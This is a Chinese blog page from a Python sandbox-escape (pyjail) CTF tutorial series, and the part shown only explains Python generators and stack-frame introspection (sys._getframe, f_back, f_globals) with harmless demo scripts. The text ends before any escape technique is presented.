  <meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e">
  <meta name="mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta
    name="viewport"
    content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover"
  ><!-- Setup Open Graph image -->

  <!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v4.4.1" />
<meta property="og:title" content="pyjail bypass-11 利用生成器栈逃逸" />
<meta property="og:locale" content="en" />
<meta name="description" content="pyjail 沙箱逃逸原理 绕过删除模块或方法 绕过基于字符串匹配的过滤 绕过命名空间限制 绕过多行限制 绕过长度限制 变量覆盖与函数篡改 绕过 audit hook 绕过 AST 沙箱 绕过输出限制 绕过 opcode 沙箱 利用生成器栈" />
<meta property="og:description" content="pyjail 沙箱逃逸原理 绕过删除模块或方法 绕过基于字符串匹配的过滤 绕过命名空间限制 绕过多行限制 绕过长度限制 变量覆盖与函数篡改 绕过 audit hook 绕过 AST 沙箱 绕过输出限制 绕过 opcode 沙箱 利用生成器栈" />
<link rel="canonical" href="/posts/pyjail-bypass-11-%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88/" />
<meta property="og:url" content="/posts/pyjail-bypass-11-%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88/" />
<meta property="og:site_name" content="DummyKitty’s Blog" />
<meta property="og:image" content="/assets/images/pyjail.jpg" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2024-11-09T14:23:57+00:00" />
<meta name="twitter:card" content="summary_large_image" />
<meta property="twitter:image" content="/assets/images/pyjail.jpg" />
<meta property="twitter:title" content="pyjail bypass-11 利用生成器栈逃逸" />
<meta name="twitter:site" content="@DummyKitty" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2025-04-02T00:46:04+00:00","datePublished":"2024-11-09T14:23:57+00:00","description":"pyjail 沙箱逃逸原理 绕过删除模块或方法 绕过基于字符串匹配的过滤 绕过命名空间限制 绕过多行限制 绕过长度限制 变量覆盖与函数篡改 绕过 audit hook 绕过 AST 沙箱 绕过输出限制 绕过 opcode 沙箱 利用生成器栈","headline":"pyjail bypass-11 利用生成器栈逃逸","image":"/assets/images/pyjail.jpg","mainEntityOfPage":{"@type":"WebPage","@id":"/posts/pyjail-bypass-11-%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88/"},"url":"/posts/pyjail-bypass-11-%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88/"}</script>
<!-- End Jekyll SEO tag -->

  <title>pyjail bypass-11 利用生成器栈逃逸 | DummyKitty's Blog
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->

<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">

  <link rel="manifest" href="/assets/img/favicons/site.webmanifest">

<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="DummyKitty's Blog">
<meta name="application-name" content="DummyKitty's Blog">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">

  <!-- Resource Hints -->
  
        <link rel="preconnect" href="https://fonts.googleapis.com" >
      
        <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
      
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      
        <link rel="dns-prefetch" href="https://fonts.gstatic.com" >
      
        <link rel="preconnect" href="https://cdn.jsdelivr.net" >
      
        <link rel="dns-prefetch" href="https://cdn.jsdelivr.net" >
      
  <!-- Bootstrap -->
  
  <!-- Theme style -->
  <link rel="stylesheet" href="/assets/css/jekyll-theme-chirpy.css">

  <!-- Web Font -->
  <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato:wght@300;400&family=Source+Sans+Pro:wght@400;600;700;900&display=swap">

  <!-- Font Awesome Icons -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.7.1/css/all.min.css">

  <!-- 3rd-party Dependencies -->

    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tocbot@4.32.2/dist/tocbot.min.css">
  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.min.css">
  
    <!-- Image Popup -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/glightbox@3.3.0/dist/css/glightbox.min.css">
  
  <!-- Scripts -->

  <script src="/assets/js/dist/theme.min.js"></script>

  <!-- JS selector for site. -->

<!-- commons -->

<!-- layout specified -->

    <!-- image lazy-loading & popup & clipboard -->
    
  <script defer src="https://cdn.jsdelivr.net/combine/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js,npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.umd.min.js,npm/glightbox@3.3.0/dist/js/glightbox.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js,npm/dayjs@1.11.13/dayjs.min.js,npm/dayjs@1.11.13/locale/en.js,npm/dayjs@1.11.13/plugin/relativeTime.js,npm/dayjs@1.11.13/plugin/localizedFormat.js,npm/tocbot@4.32.2/dist/tocbot.min.js"></script>

<script defer src="/assets/js/dist/post.min.js"></script>

<!-- Pageviews -->

    <!-- PWA -->
    
      <script
        defer
        src="/app.min.js?baseurl=&register=true"
      ></script>
    
    <!-- Web Analytics -->
    
  <!-- A placeholder to allow defining custom metadata -->

</head>

  <body>
    <!-- The Side Bar -->

<aside aria-label="Sidebar" id="sidebar" class="d-flex flex-column align-items-end">
  <header class="profile-wrapper">
    <a href="/" id="avatar" class="rounded-circle"><img src="/assets/images/me.png" width="112" height="112" alt="avatar" onerror="this.style.display='none'"></a>

    <a class="site-title d-block" href="/">DummyKitty's Blog</a>
    <p class="site-subtitle fst-italic mb-0">Code Audit@xxx / Penetration Tester@xxx / CTFer</p>
  </header>
  <!-- .profile-wrapper -->

  <nav class="flex-column flex-grow-1 w-100 ps-0">
    <ul class="nav">
      <!-- home -->
      <li class="nav-item">
        <a href="/" class="nav-link">
          <i class="fa-fw fas fa-home"></i>
          <span>HOME</span>
        </a>
      </li>
      <!-- the real tabs -->
      
        <li class="nav-item">
          <a href="/categories/" class="nav-link">
            <i class="fa-fw fas fa-stream"></i>
            
            <span>CATEGORIES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/tags/" class="nav-link">
            <i class="fa-fw fas fa-tags"></i>
            
            <span>TAGS</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/archives/" class="nav-link">
            <i class="fa-fw fas fa-archive"></i>
            
            <span>ARCHIVES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/about/" class="nav-link">
            <i class="fa-fw fas fa-info-circle"></i>
            
            <span>ABOUT</span>
          </a>
        </li>
        <!-- .nav-item -->
      
    </ul>
  </nav>

  <div class="sidebar-bottom d-flex flex-wrap  align-items-center w-100">
    
        <a
          href="https://github.com/DummyKitty"
          aria-label="github"
          
            target="_blank"
            
            rel="noopener noreferrer"
          
        >
          <i class="fab fa-github"></i>
        </a>
      
        <a
          href="/feed.xml"
          aria-label="rss"
          
        >
          <i class="fas fa-rss"></i>
        </a>
      
  </div>
  <!-- .sidebar-bottom -->
</aside>
<!-- #sidebar -->

    <div id="main-wrapper" class="d-flex justify-content-center">
      <div class="container d-flex flex-column px-xxl-5">
        <!-- The Top Bar -->

<header id="topbar-wrapper" aria-label="Top Bar">
  <div
    id="topbar"
    class="d-flex align-items-center justify-content-between px-lg-3 h-100"
  >
    <nav id="breadcrumb" aria-label="Breadcrumb">
      
            <span>
              <a href="/">Home</a>
            </span>

              <span>pyjail bypass-11 利用生成器栈逃逸</span>
            
    </nav>
    <!-- endof #breadcrumb -->

    <button type="button" id="sidebar-trigger" class="btn btn-link">
      <i class="fas fa-bars fa-fw"></i>
    </button>

    <div id="topbar-title">
      Post
    </div>

    <button type="button" id="search-trigger" class="btn btn-link">
      <i class="fas fa-search fa-fw"></i>
    </button>

    <search id="search" class="align-items-center ms-3 ms-lg-0">
      <i class="fas fa-search fa-fw"></i>
      <input
        class="form-control"
        id="search-input"
        type="search"
        aria-label="search"
        autocomplete="off"
        placeholder="Search..."
      >
    </search>
    <button type="button" class="btn btn-link text-decoration-none" id="search-cancel">Cancel</button>
  </div>
</header>

        <div class="row flex-grow-1">
          <main aria-label="Main Content" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              <!-- Refactor the HTML structure -->

<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->

<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->

<!-- Change the icon of checkbox -->

<!-- Handle images -->

    <!-- take out classes -->
    
    <!-- lazy-load images -->
    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      
        <!-- create the image wrapper -->
        
    <!-- combine -->
    
<!-- Add header for code snippets -->

<!-- Create heading anchors -->

<!-- return -->

<article class="px-1" data-toc="true">
  <header>
    <h1 data-toc-skip>pyjail bypass-11 利用生成器栈逃逸</h1>
    
    <div class="post-meta text-muted">
      <!-- published date -->
      <span>
        Posted
        <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->

<time
  
  data-ts="1731162237"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  Nov  9, 2024
</time>

      </span>

      <!-- lastmod date -->
      
        <span>
          Updated
          <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->

<time
  
  data-ts="1743554764"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  Apr  2, 2025
</time>

        </span>
      
        <div class="mt-3 mb-3">
          <a href="/assets/images/pyjail.jpg" class="popup img-link preview-img shimmer"><img src="/assets/images/pyjail.jpg"  alt="Preview Image" width="1200" height="630"  loading="lazy"></a></div>
      
      <div class="d-flex justify-content-between">
        <!-- author(s) -->
        <span>
          
          By

          <em>
            
              <a href="https://twitter.com/DummyKitty">DummyKitty</a>
            
          </em>
        </span>

        <div>
          <!-- pageviews -->
          
          <!-- read time -->
          <!-- Calculate the post's reading time, and display the word count in tooltip -->

<!-- words per minute -->

<!-- return element -->
<span
  class="readtime"
  data-bs-toggle="tooltip"
  data-bs-placement="bottom"
  title="2817 words"
>
  <em>15 min</em> read</span>

        </div>
      </div>
    </div>
  </header>

    <div id="toc-bar" class="d-flex align-items-center justify-content-between invisible">
      <span class="label text-truncate">pyjail bypass-11 利用生成器栈逃逸</span>
      <button type="button" class="toc-trigger btn me-1">
        <i class="fa-solid fa-list-ul fa-fw"></i>
      </button>
    </div>

    <button id="toc-solo-trigger" type="button" class="toc-trigger btn btn-outline-secondary btn-sm">
      <span class="label ps-2 pe-1">Contents</span>
      <i class="fa-solid fa-angle-right fa-fw"></i>
    </button>

    <dialog id="toc-popup" class="p-0">
      <div class="header d-flex flex-row align-items-center justify-content-between">
        <div class="label text-truncate py-2 ms-4">pyjail bypass-11 利用生成器栈逃逸</div>
        <button id="toc-popup-close" type="button" class="btn mx-1 my-1 opacity-75">
          <i class="fas fa-close"></i>
        </button>
      </div>
      <div id="toc-popup-content" class="px-4 py-3 pb-4"></div>
    </dialog>
  
  <div class="content">
    <blockquote>
  <ul>
    <li><a href="/posts/python-沙箱逃逸原理/">pyjail 沙箱逃逸原理</a></li>
    <li><a href="/posts/pyjail-bypass-01-绕过删除模块或方法/">绕过删除模块或方法</a></li>
    <li><a href="/posts/pyjail-bypass-02-字符串变换绕过/">绕过基于字符串匹配的过滤</a></li>
    <li><a href="/posts/pyjail-bypass-03-绕过命名空间限制/">绕过命名空间限制</a></li>
    <li><a href="/posts/pyjail-bypass-05-绕过长度限制/">绕过多行限制</a></li>
    <li><a href="/posts/pyjail-bypass-04-绕过多行限制/">绕过长度限制</a></li>
    <li><a href="/posts/pyjail-bypass-06-变量覆盖与函数篡改/">变量覆盖与函数篡改</a></li>
    <li><a href="/posts/pyjail-bypass-07-绕过-audit-hook/">绕过 audit hook</a></li>
    <li><a href="/posts/pyjail-bypass-08-绕过-AST-沙箱/">绕过 AST 沙箱</a></li>
    <li><a href="/posts/pyjail-bypass-09-绕过输出限制/">绕过输出限制</a></li>
    <li><a href="/posts/pyjail-bypass-10-绕过-opcode-沙箱/">绕过 opcode 沙箱</a></li>
    <li><a href="/posts/pyjail-bypass-11-利用生成器栈/">利用生成器栈</a></li>
  </ul>
</blockquote>

<p>本文仅作为个人学习记录，大部分参考自下面的文章，讲解得非常细致：</p>
<ul>
  <li><a href="https://pid-blog.com/article/frame-escape-pyjail#%E9%A2%98%E8%A7%A3%EF%BC%9Amossfern">利用生成器栈帧逃逸 Pyjail - CISCN 2024 mossfern 题解</a></li>
</ul>

<h2 id="利用生成器栈帧进行逃逸"><span class="me-2">利用生成器栈帧进行逃逸</span><a href="#利用生成器栈帧进行逃逸" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<h3 id="生成器"><span class="me-2">生成器</span><a href="#生成器" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<p>在 Python 中，生成器（Generator）是一种特殊的迭代器，它能够逐个生成值，而不需要一次性将所有值存储在内存中。生成器的主要特点是它们能够 惰性计算，即按需生成数据，这使得它们在处理大量数据或无限序列时非常高效。</p>

<p>生成器通过使用 yield 关键字来返回值，而不是像普通函数那样使用 return。当一个函数包含 yield 时，它就成为了一个生成器函数。调用这个函数不会立即执行，而是返回一个生成器对象。每次调用生成器对象的 next() 方法时，函数会从上次暂停的地方继续执行，直到再次遇到 yield 或结束。</p>
<h4 id="创建生成器"><span class="me-2">创建生成器</span><a href="#创建生成器" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>创建生成器有以下两种方法：</p>
<ol>
  <li>使用 yield 关键字
    <div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre></td><td class="rouge-code"><pre> <span class="k">def</span> <span class="nf">my_generator</span><span class="p">():</span>
     <span class="k">yield</span> <span class="mi">1</span>
     <span class="k">yield</span> <span class="mi">2</span>
     <span class="k">yield</span> <span class="mi">3</span>

 <span class="n">gen</span> <span class="o">=</span> <span class="nf">my_generator</span><span class="p">()</span>
 <span class="nf">print</span><span class="p">(</span><span class="nf">type</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span> <span class="c1"># &lt;class 'generator'&gt;
</span> <span class="nf">print</span><span class="p">(</span><span class="n">gen</span><span class="p">)</span>       <span class="c1"># &lt;generator object my_generator at 0x7f4a20e049e0&gt;
</span>
 <span class="nf">print</span><span class="p">(</span><span class="nf">next</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span>  <span class="c1"># 输出: 1
</span> <span class="nf">print</span><span class="p">(</span><span class="nf">next</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span>  <span class="c1"># 输出: 2
</span> <span class="nf">print</span><span class="p">(</span><span class="nf">next</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span>  <span class="c1"># 输出: 3
</span></pre></td></tr></tbody></table></code></div>    </div>
  </li>
  <li>使用生成器表达式。类似于列表推导式，但使用小括号 () 而不是方括号 [] 来创建生成器表达式。
    <div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre> <span class="n">gen_exp</span> <span class="o">=</span> <span class="p">(</span><span class="n">x</span> <span class="o">*</span> <span class="n">x</span> <span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="nf">range</span><span class="p">(</span><span class="mi">5</span><span class="p">))</span>

 <span class="k">for</span> <span class="n">num</span> <span class="ow">in</span> <span class="n">gen_exp</span><span class="p">:</span>
     <span class="nf">print</span><span class="p">(</span><span class="n">num</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></div>    </div>
    <h4 id="生成器转化为列表"><span class="me-2">生成器转化为列表</span><a href="#生成器转化为列表" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
    <p>生成器转换为列表可以使用如下的几种方式：</p>
  </li>
  <li>list 构造函数</li>
  <li>列表推导式</li>
  <li><code class="language-plaintext highlighter-rouge">*</code> 解包操作符
```py
gen = (x for x in range(5))<br />
lst = list(gen)</li>
</ol>

<p>gen = (x for x in range(5))<br />
lst = [x for x in gen]</p>

<p>gen = (x for x in range(5))<br />
lst = [*gen]</p>
<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre></td><td class="rouge-code"><pre>

### 栈帧
在 Python 中，栈帧（Stack Frame）是每次函数调用时创建的执行上下文。每个栈帧包含了函数的局部变量、参数、返回地址等信息，并且这些栈帧按照调用顺序被压入 调用栈（Call Stack）中。

#### 获取栈帧
获取栈帧的基本方法是使用 sys._getframe 方法：
```py
import sys
f1 = sys._getframe()
print(f1)
# &lt;frame at 0x7fb8d49984a0, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack.py', line 3, code &lt;module&gt;&gt;
print(type(f1)) # &lt;class 'frame'&gt;
</pre></td></tr></tbody></table></code></div></div>
<p>f1 就是一个栈帧对象。</p>

<p>另一种方法是用 inspect 库的 currentframe 方法</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre><span class="kn">import</span> <span class="n">inspect</span>
<span class="n">f2</span> <span class="o">=</span> <span class="n">inspect</span><span class="p">.</span><span class="nf">currentframe</span><span class="p">()</span>
</pre></td></tr></tbody></table></code></div></div>
<h4 id="交互式命令行的差异"><span class="me-2">交互式命令行的差异</span><a href="#交互式命令行的差异" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>注意，由于 Python 交互式命令行在执行代码时会使用单独的栈帧，因此下面的代码在交互式命令行与脚本文件中执行的结果不同。</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td><td class="rouge-code"><pre><span class="o">&gt;&gt;&gt;</span> <span class="kn">import</span> <span class="n">sys</span>
<span class="o">&gt;&gt;&gt;</span> <span class="n">f1</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>
<span class="o">&gt;&gt;&gt;</span> <span class="n">f2</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>
<span class="o">&gt;&gt;&gt;</span> <span class="n">f1</span> <span class="o">==</span> <span class="n">f2</span>
<span class="bp">False</span>
</pre></td></tr></tbody></table></code></div></div>
<p>直接执行脚本文件时返回 True</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td><td class="rouge-code"><pre><span class="kn">import</span> <span class="n">sys</span>
<span class="n">f1</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>
<span class="nf">print</span><span class="p">(</span><span class="n">f1</span><span class="p">)</span>
<span class="nf">print</span><span class="p">(</span><span class="nf">type</span><span class="p">(</span><span class="n">f1</span><span class="p">))</span>
<span class="n">f2</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>
<span class="nf">print</span><span class="p">(</span><span class="n">f1</span> <span class="o">==</span> <span class="n">f2</span><span class="p">)</span> <span class="c1"># True
</span></pre></td></tr></tbody></table></code></div></div>
<h4 id="栈帧工作原理"><span class="me-2">栈帧工作原理</span><a href="#栈帧工作原理" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>栈帧的工作原理如下：</p>
<ol>
  <li>当程序开始执行时，会创建一个==全局帧（global frame）==，它是整个程序的顶层上下文。</li>
  <li>每当==调用一个函数时，Python 会创建一个新的栈帧，并将其压入调用栈顶部==。</li>
  <li>==当函数完成执行后，当前栈帧会被弹出，并将控制权返回给上一个栈帧==。</li>
  <li>这种过程持续进行，直到所有函数都执行完毕，最终回到全局帧。</li>
</ol>

<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
</pre></td><td class="rouge-code"><pre><span class="kn">import</span> <span class="n">sys</span>
<span class="n">frame</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>
<span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">global frame: </span><span class="si">{</span><span class="n">frame</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">add</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">):</span>
    <span class="n">frame</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>  <span class="c1"># 获取当前的栈帧
</span>    <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">add() frame: </span><span class="si">{</span><span class="n">frame</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">a</span> <span class="o">+</span> <span class="n">b</span>

<span class="k">def</span> <span class="nf">multiply</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">):</span>
    <span class="n">frame</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>  <span class="c1"># 获取当前的栈帧
</span>    <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">multiply() frame: </span><span class="si">{</span><span class="n">frame</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
    <span class="k">return</span> <span class="nf">add</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">)</span> <span class="o">*</span> <span class="n">y</span>

<span class="n">result</span> <span class="o">=</span> <span class="nf">multiply</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">)</span>
<span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Result: </span><span class="si">{</span><span class="n">result</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>

<span class="c1"># global frame: &lt;frame at 0x7f5793d5a400, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack_1.py', line 3, code &lt;module&gt;&gt;
# multiply() frame: &lt;frame at 0x7f5793d35480, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack_1.py', line 11, code multiply&gt;
# add() frame: &lt;frame at 0x7f5793d34940, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack_1.py', line 6, code add&gt;
</span></pre></td></tr></tbody></table></code></div></div>

<h4 id="栈帧的内容"><span class="me-2">栈帧的内容</span><a href="#栈帧的内容" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>使用 dir 查看栈帧的内容：</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
</pre></td><td class="rouge-code"><pre><span class="nf">dir</span><span class="p">(</span><span class="n">f1</span><span class="p">)</span>
<span class="c1"># ['__class__',
#  '__delattr__',
#  '__dir__',
#  '__doc__',
#  '__eq__',
#  '__format__',
#  '__subclasshook__',
#  ...
#  'clear',
#  'f_back',
#  'f_builtins',
#  'f_code',
#  'f_globals',
#  'f_lasti',
#  'f_lineno',
#  'f_locals',
#  'f_trace',
#  'f_trace_lines',
#  'f_trace_opcodes']
</span></pre></td></tr></tbody></table></code></div></div>
<p>除了 Object 共有的属性之外，有一些 f_ 开头的属性是栈帧对象独有的。</p>
<ul>
  <li>f_back：它是指向上一个栈帧的指针。在 Python 中，f1.f_back 拿到的也是一个栈帧对象。</li>
  <li>f_builtins、f_globals、f_locals：对应着当前栈帧的 builtins、globals、locals 对象。</li>
</ul>

<p>我们可以使用前面的脚本进行测试：</p>

<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
</pre></td><td class="rouge-code"><pre><span class="kn">import</span> <span class="n">sys</span>
<span class="n">global_frame</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>
<span class="n">multiply_frame</span> <span class="o">=</span> <span class="bp">None</span>
<span class="n">add_frame</span> <span class="o">=</span> <span class="bp">None</span>
<span class="c1"># print(f"global frame: {global_frame}")
</span><span class="k">def</span> <span class="nf">add</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">):</span>
    <span class="n">add_frame</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>  <span class="c1"># 获取当前的栈帧
</span>    <span class="c1"># print(f"add() frame: {frame}")
</span>    <span class="nf">print</span><span class="p">(</span><span class="n">multiply_frame</span> <span class="o">==</span> <span class="n">add_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">a</span> <span class="o">+</span> <span class="n">b</span>

<span class="k">def</span> <span class="nf">multiply</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">):</span>
    <span class="k">global</span> <span class="n">multiply_frame</span>
    <span class="n">multiply_frame</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>  <span class="c1"># 获取当前的栈帧
</span>    <span class="c1"># print(f"multiply() frame: {frame}")
</span>    <span class="nf">print</span><span class="p">(</span><span class="n">global_frame</span> <span class="o">==</span> <span class="n">multiply_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">)</span>
    <span class="k">return</span> <span class="nf">add</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">)</span> <span class="o">*</span> <span class="n">y</span>

<span class="n">result</span> <span class="o">=</span> <span class="nf">multiply</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">)</span>
<span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Result: </span><span class="si">{</span><span class="n">result</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>

<span class="c1"># True
# True
# Result: 15
</span></pre></td></tr></tbody></table></code></div></div>

<h3 id="生成器的栈帧"><span class="me-2">生成器的栈帧</span><a href="#生成器的栈帧" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>每次调用一个普通函数时，Python 会为该函数创建一个新的栈帧，并将其压入调用栈中。当函数执行完毕后，栈帧会被弹出。生成器的实现也使用到了栈帧，但不同的是，生成器可以暂停执行，并在恢复时继续从暂停的位置执行，也就意味着生成器的栈帧行为有所区别。</p>

<p>下面是一个测试示例：</p>
